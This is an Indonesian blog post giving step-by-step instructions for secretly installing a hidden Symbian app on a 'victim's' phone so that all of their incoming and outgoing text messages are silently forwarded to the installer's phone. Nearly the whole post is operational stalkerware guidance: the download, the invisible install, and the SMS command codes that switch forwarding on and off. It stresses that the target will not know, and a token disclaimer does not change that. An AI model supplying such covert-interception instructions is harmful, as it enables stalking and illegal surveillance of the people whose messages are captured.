Tentang patimber

×

Cari Bukti Lewat Sms dengan Aplikasi Sadap Sms

Assallamu'alaikum, sebelumnya Admin menggaris bawahi agar aplikasi untuk menyadap sms ini di pergunakan untuk sewajarnya dan tidak untuk mengganggu privasi orang lain. / untuk tujuan baik saja intinya.

Menuduh tanpa alasan mungkin kurang baik, apa yang hendak di tuduhkan dan apa buktinya, untuk jaman modern seperti sekarang mayoritas semua orang udah menggunakan fasilitas handphone dalam kesehariannya. yang mana bisa dikatakan 50% dari rahasia yang di sembunyikan bisa kita ketahui lewat sms yang keluar masuk dari handphone orang yang kita curigai. nach, bagaimana caranya agar kita bisa memonitor setiap pesan yang keluar masuk di ponsel orang yang akan kita jadikan target. apa mungkin ! jawabnya mungkin saja di jaman yang udah maju seperti sekarang bisa kita katakan mungkin. akhirnya saya coba googling kesana kemari dan ternyata jawabannya BISA. yang kita butuhkan hanyalah sebuah aplikasi yang bisa memonitor setiap sms yang keluar masuk dari hp target. cara kerjanya simple, yaitu setiap sms yang masuk / keluar secara otomatis akan dikirimkan ke no hp yang kita inginkan / hp kita. bagaimana kalo di ketahui oleh target, gak usah khawatir karena aplikasi ini setelah di instal di hp korban gak akan diketahui oleh korban / bekerja secara tersembunyi. oke dech saya rasa sobat sudah tahu inti dari artikel ini dan sudah gak sabar ingin mencobanya. silahkan download DISINI AJA.

CARANYA :


1. download smsanywherelite.sis untuk software menyadap.
direct link :  DISINI



2. Masukkan aplikasi symbian itu di HP anda dan korban

3. Begitu aplikasi ini diinstal, kamu tidak bisa melihat program maupun ikon aplikasi itu dalam ponsel. Seluruh pengontrolannya harus lewat sms, mulai dari pengaktifan dan mematikan program, mengubah password, hingga pengiriman sms ke ponsel lain. Tapi justru itu keuntungannya jika digunakan sebagai alat sadap. Berarti sang target kan tidak tahu kalau diponselnya telah dipasangi aplikasi tersebut. Justru itu, teman anda tidak akan tahu kan kalo smsnya disadap? Karena aplikasi symbian ini belum mendukung GUI (Graphics User Interface).

4. Siapkan hp/ponsel korban anda

5. Siapkan HP anda yang akan menerima sms masuk dari korban anda.

6. Aktifkan aplikasi ini di ponsel korban kamu dengan mengetik format sms -[ SA(spasi)(password)(spasi)ON ]-. Panjang password maksimal 8 karakter. Misal, jika password kamu adalah intel99, ketikkan SA intel99 ON kirim sms ini ke nomor ponsel kedua/ponsel kamu. Untuk mematikannya, ketik SA intel99 OFF ke nomor yang sama.

7. Lalu, jika anda ingin menyadap lebih dari 5 hari..atau setiap sms masuk di hp korban akan selalu diteruskan ke hp anda, ketik sms ini di hp korban anda : SA(spasi)(password)(spasi)R1, misal SA intel99 R1. Untuk mematikan fungsi ini ganti parameter di belakang “R” menjadi nol. Jadi, tuliskan SA intel99 R0. Sedangkan untuk meneruskan setiap sms keluar, kirim sms bertuliskan SA intel99 S1 ke nomer kamu. Matikan fungsi ini dengan mengirim SMS SA intel99 S0

8. Enjoy dan tunggu forward dari setiap sms yang keluar / masuk dari target.

Selamat Mencoba .... 

Nb : Admin tidak bertanggung jawab atas dampak penggunaan aplikasi ini.



Author: - 6:00 AM

Tidak ada komentar